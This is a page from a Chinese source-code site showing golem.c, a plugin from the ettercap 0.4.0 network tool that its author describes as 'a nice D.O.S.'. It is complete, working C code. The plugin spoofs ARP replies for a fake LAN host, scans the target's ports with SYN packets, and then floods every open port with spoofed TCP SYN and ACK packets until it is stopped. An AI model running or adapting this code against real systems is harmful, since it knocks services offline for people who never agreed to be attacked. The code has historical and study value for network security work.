开通博客赚积分
发布资源赚积分
分类

源码开发语言/平台
当前位置:首页 > 源码/资料 > Internet/网络编程 > 网络截获/分析 > 查看源码
golem.c
资源名称:ettercap-0.4.0.tar.gz [点击查看]
上传用户:nilegod
上传日期:2007-01-08
资源大小:220k
文件大小:7k
源码类别:

网络截获/分析

开发平台:

C/C++

golem.c:源码内容
  1. /*
  2.     golem -- ettercap plugin --  a nice D.O.S. :)
  4.     Copyright (C) 2001  NaGoR
  6.     This program is free software; you can redistribute it and/or modify
  7.     it under the terms of the GNU General Public License as published by
  8.     the Free Software Foundation; either version 2 of the License, or
  9.     (at your option) any later version.
  11.     This program is distributed in the hope that it will be useful,
  12.     but WITHOUT ANY WARRANTY; without even the implied warranty of
  13.     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  14.     GNU General Public License for more details.
  16.     You should have received a copy of the GNU General Public License
  17.     along with this program; if not, write to the Free Software
  18.     Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
  19. */
  21. #include <sys/types.h>
  22. #include <sys/ipc.h>
  23. #include <sys/shm.h>
  24. #include <signal.h>
  25. #include <unistd.h>
  26. #include <stdlib.h>
  27. #include <time.h>
  29. #include "../../src/include/ec_main.h"
  30. #include "../../src/include/ec_plugins.h"
  31. #include "../../src/include/ec_inet_structures.h"
  32. #include "../../src/include/ec_inet.h"
  33. #include "../../src/include/ec_inet_forge.h"
  35. char Ettercap_Version[] = VERSION;                       // required -- for compatibility
  37. char PlugIn_Info[] = "nice D.O.S.  BE CAREFULL !!";
  39. short PlugIn_Version = 8;
  42. #define SYN_SEQ 6969
  44. // global data...
  46. int IPS, IPD, sock, MTU, CID1, CID2, *port_index;
  47. unsigned short PORTS, IP_ID;
  48. short *PORTREP;
  49. unsigned char MACS[6];
  50. unsigned char MACD[6];
  51. char *pck_to_send;
  54. // ---------------------------
  56. void Parse_packet(char *buffer)
  57. {
  58.    IP_header  *ip;
  59.    TCP_header *tcp;
  61.    ip = (IP_header *) (buffer+ETH_HEADER);
  62.    if (ip->source_ip==IPD && ip->dest_ip==IPS && ip->proto==IPPROTO_TCP)
  63.    {
  64.       tcp = (TCP_header *) ((int)ip + ip->h_len * 4);
  65.       if ( (tcp->flags & TH_SYN) && (tcp->flags & TH_ACK) )
  66.       {
  67.          int i;
  68.          for (i=0; i<*port_index; i++)
  69.              if (ntohs(tcp->source)==PORTREP[i]) break;
  71.          if (i==*port_index)
  72.          {
  73.             PORTREP[i]=ntohs(tcp->source);
  74.             *port_index=*port_index+1;
  75.          }
  77.          Inet_Forge_ethernet( pck_to_send, MACS, MACD, ETH_P_IP );
  78.          Inet_Forge_ip( pck_to_send + ETH_HEADER, IPS, IPD, TCP_HEADER, IP_ID++, 0, IPPROTO_TCP);
  79.          Inet_Forge_tcp( pck_to_send + ETH_HEADER + IP_HEADER, ntohs(tcp->dest), ntohs(tcp->source),  SYN_SEQ+1, ntohl(tcp->seq)+1, TH_ACK, 0, 0);
  81.          Inet_SendRawPacket(sock, pck_to_send, ETH_HEADER + IP_HEADER + TCP_HEADER );
  82.       }
  83.    }
  84. }
  88. int Fake_Host()
  89. {
  90.    unsigned int N_hosts, index, index1=0, index2, base_ip, fake_ip=0;
  91.    unsigned long NetMask;
  93.    Inet_GetIfaceInfo(Options.netiface, NULL, NULL, NULL, &NetMask);
  94.    N_hosts = ntohl(~NetMask);
  96.    base_ip = inet_addr(Host_In_LAN[0].ip)&NetMask;
  98.    for (index=1; index<N_hosts; index++)
  99.    {
  100.       fake_ip = base_ip|htonl(index);
  101.       for (index2=0; index2 < number_of_hosts_in_lan; index2++)
  102.          if (fake_ip == inet_addr(Host_In_LAN[index2].ip))
  103.             break;
  104.       if (index2 == number_of_hosts_in_lan) break;
  105.    }
  107.    if (index1 == N_hosts) return 0;
  109.    return (fake_ip);
  110. }
  114. void PlugIn_Start(char**argv)
  115. {
  116.     int key, i;
  117.     char cont[5];
  119.     if (!strcmp(Host_Dest.ip,""))
  120.     {
  121.       Plugin_Output("Please select a Dest...n");
  122.       return;
  123.     }
  125.     memset(cont, 0, 5);
  127.     Plugin_Output("Are you sure you want to Golemize %s ? (yes/no) ", Host_Dest.ip );
  128.     Plugin_Input(cont, 4, P_BLOCK);
  129.     if (strcmp(cont, "yes"))  // not sure... ;)
  130.     {
  131.       Plugin_Output("It is safe!  for now...");
  132.       return;
  133.     }
  135.     Plugin_Output("Building host list for netmask %s, please wait...n", Inet_MySubnet());
  136.     number_of_hosts_in_lan = Inet_HostInLAN();
  138.     for (i=0; i<number_of_hosts_in_lan; i++)
  139.       if (!strcmp(Host_Dest.ip, Host_In_LAN[i].ip))
  140.          Inet_GetMACfromString(Host_In_LAN[i].mac, MACD);
  142.     IPS = Fake_Host();
  143.     if (IPS == 0)
  144.     {
  145.       Plugin_Output("I can't find an unused IP in this LAN.n");
  146.       Plugin_Output("I can't create the Fake Hostn");
  147.       return;
  148.     }
  149.     IPD = inet_addr(Host_Dest.ip);
  151.     sock = Inet_OpenRawSock(Options.netiface);
  152.     Inet_GetIfaceInfo(Options.netiface, &MTU, MACS, 0, 0);
  154.     key = shmget(0,15000,IPC_CREAT | 0600);
  155.     port_index = (int *)shmat(key,0,0);
  156.     shmctl(key, IPC_RMID, NULL);
  157.     PORTREP = (short *)(port_index+1);
  158.     memset(PORTREP,0,4096*sizeof(short));
  159.     srand(time(0));
  160.     IP_ID = PORTS = rand()%(0xFFFE)+1;
  161.     *port_index = 0;
  163.     if (! (CID1=fork()) )
  164.     {
  165.        strcpy(program_argv0, "golem");
  167.          pck_to_send = (char *)Inet_Forge_packet( ETH_HEADER + ARP_HEADER );
  168.          Inet_Forge_ethernet( pck_to_send, MACS, MACD, ETH_P_ARP );
  169.          Inet_Forge_arp( pck_to_send+ETH_HEADER, ARPOP_REPLY, MACS, IPS, MACD, IPD);
  171.          for (;;)
  172.          {
  173.             Inet_SendRawPacket(sock, pck_to_send, ETH_HEADER + ARP_HEADER);
  174.             sleep(2);
  175.          }
  176.     }
  178.     pck_to_send = (char *)Inet_Forge_packet( ETH_HEADER + IP_HEADER + TCP_HEADER );
  180.     if (! (CID2=fork()) )
  181.     {
  182.          char *recv_pck;
  184.           strcpy(program_argv0, "golem");
  186.          for (i=1; i<1000; i++)
  187.          {
  188.             Inet_Forge_ethernet( pck_to_send, MACS, MACD, ETH_P_IP );
  189.             Inet_Forge_ip( pck_to_send + ETH_HEADER, IPS, IPD, TCP_HEADER, IP_ID++, 0, IPPROTO_TCP);
  190.             Inet_Forge_tcp( pck_to_send + ETH_HEADER + IP_HEADER, PORTS, i,  SYN_SEQ, 0, TH_SYN, 0, 0);
  191.             Inet_SendRawPacket(sock, pck_to_send, ETH_HEADER + IP_HEADER + TCP_HEADER );
  192.     if(!(i%5)) usleep(500);
  193.          }
  195.          recv_pck = (char *)Inet_Forge_packet(MTU);
  197.          for (;;)
  198.          {
  199.             Inet_GetRawPacket(sock, recv_pck, MTU, NULL);
  200.             Parse_packet(recv_pck);
  201.          }
  202.     }
  203.     else
  204.     {
  205.          int index;
  206.          int OldIndex=0;
  207.          char c[1] = "";
  208.          struct in_addr fake;
  210.          port_index=(int *)shmat(key,0,0);
  211.          PORTREP=(short *)(port_index+1);
  213.          fake.s_addr = IPS;
  215.           Plugin_Output("nD.O.S.ing: %s  from fake host: %sn", Host_Dest.ip, inet_ntoa(fake));
  216.           Plugin_Output("nPress return to stop...nn");
  218.          for (;;)
  219.          {
  220.             for (index=0; index<(*port_index); index++)
  221.             {
  223.                for (;OldIndex<(*port_index); OldIndex++)
  224.                   Plugin_Output("Attacking on port %dn",PORTREP[OldIndex]);
  226.                PORTS++;
  228.                Inet_Forge_ethernet( pck_to_send, MACS, MACD, ETH_P_IP );
  229.                Inet_Forge_ip( pck_to_send + ETH_HEADER, IPS, IPD, TCP_HEADER, IP_ID++, 0, IPPROTO_TCP);
  230.                Inet_Forge_tcp( pck_to_send + ETH_HEADER + IP_HEADER, PORTS, PORTREP[index],  SYN_SEQ, 0, TH_SYN, 0, 0);
  231.                Inet_SendRawPacket(sock, pck_to_send, ETH_HEADER + IP_HEADER + TCP_HEADER );
  232.                if (!(index%5)) usleep(500);
  233.     }
  234.     usleep(2000);
  235.             if (Plugin_Input(c, 1, P_NONBLOCK))
  236.             {
  237.                kill(CID1,SIGTERM);
  238.                kill(CID2,SIGTERM);
  239.                Inet_Forge_packet_destroy( pck_to_send );
  240.                close(sock);
  241.                return;
  242.             }
  243.          }
  244.     }
  245. }
  247. /* EOF */